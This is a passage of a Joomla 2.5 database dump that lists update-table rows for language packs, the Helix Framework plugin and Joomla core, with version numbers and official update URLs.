Cyrillic','','pkg_sr-RS','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(1243,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(1244,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(1245,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(1246,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(1247,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(1248,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(1249,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(1250,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(1251,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(1252,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(1253,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(1254,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(1255,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.23.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(1256,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(1257,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.8','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(1258,1,0,0,'Joomla','','joomla','file','',0,'2.5.24','','http://update.joomla.org/core/extension.xml',''),(1259,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(1260,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(1261,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(1262,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(1263,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(1264,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(1265,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(1266,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(1267,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(1268,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(1269,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(1270,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(1271,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(1272,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(1273,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.20.2','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(1274,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.23.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(1275,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(1276,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(1277,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-AU_details.xml',''),(1278,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(1279,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(1280,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(1281,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(1282,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(1283,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(1284,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(1285,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(1286,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(1287,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(1288,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(1289,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(1290,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(1291,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(1292,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.23.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(1293,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(1294,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.8','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(1295,1,0,0,'Joomla','','joomla','file','',0,'2.5.24','','http://update.joomla.org/core/extension.xml',''),(1296,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(1297,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(1298,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(1299,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(1300,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(1301,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(1302,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(1303,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(1304,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(1305,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(1306,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(1307,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(1308,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(1309,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(1310,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.20.2','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(1311,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.23.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(1312,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(1313,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(1314,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-AU_details.xml',''),(1315,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(1316,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(1317,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(1318,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(1319,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(1320,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(1321,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(1322,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(1323,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(1324,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(1325,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(1326,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(1327,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(1328,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(1329,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.23.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(1330,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(1331,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.8','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(1332,1,0,0,'Joomla','','joomla','file','',0,'2.5.25','','http://update.joomla.org/core/extension.xml',''),(1333,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(1334,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(1335,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(1336,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(1337,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(1338,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(1339,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(1340,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(1341,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(1342,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(1343,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(1344,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(1345,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(1346,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(1347,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(1348,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(1349,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(1350,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(1351,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-AU_details.xml',''),(1352,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(1353,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(1354,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(1355,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(1356,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(1357,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(1358,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(1359,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(1360,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(1361,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(1362,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(1363,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(1364,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(1365,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(1366,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.23.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(1367,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(1368,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.8','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(1369,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.8','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(1370,1,0,0,'Joomla','','joomla','file','',0,'2.5.25','','http://update.joomla.org/core/extension.xml',''),(1371,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(1372,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(1373,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(1374,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(1375,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(1376,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(1377,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(1378,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(1379,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(1380,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(1381,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(1382,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(1383,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(1384,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(1385,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(1386,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(1387,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(1388,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(1389,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-AU_details.xml',''),(1390,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(1391,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(1392,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(1393,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(1394,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(1395,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(1396,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(1397,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.21.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(1398,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(1399,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(1400,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(1401,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(1402,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(1403,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(1404,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.23.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(1405,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(1406,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.8','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(1407,1,0,0,'Joomla','','joomla','file','',0,'2.5.25','','http://update.joomla.org/core/extension.xml',''),(1408,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(1409,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(1410,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(1411,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(1412,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(1413,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(1414,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(1415,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(1416,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(1417,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(1418,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(1419,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(1420,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(1421,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(1422,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(1423,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(1424,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(1425,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(1426,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-AU_details.xml',''),(1427,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(1428,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(1429,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(1430,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(1431,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(1432,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(1433,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(1434,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(1435,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(1436,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(1437,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(1438,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(1439,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(1440,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(1441,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.23.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(1442,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(1443,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.8','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(1444,1,0,0,'Joomla','','joomla','file','',0,'2.5.27','','http://update.joomla.org/core/extension.xml',''),(1445,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(1446,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.26.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(1447,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(1448,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(1449,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(1450,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(1451,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(1452,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(1453,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(1454,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(1455,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(1456,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(1457,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(1458,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(1459,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(1460,3,0,0,'Arabic 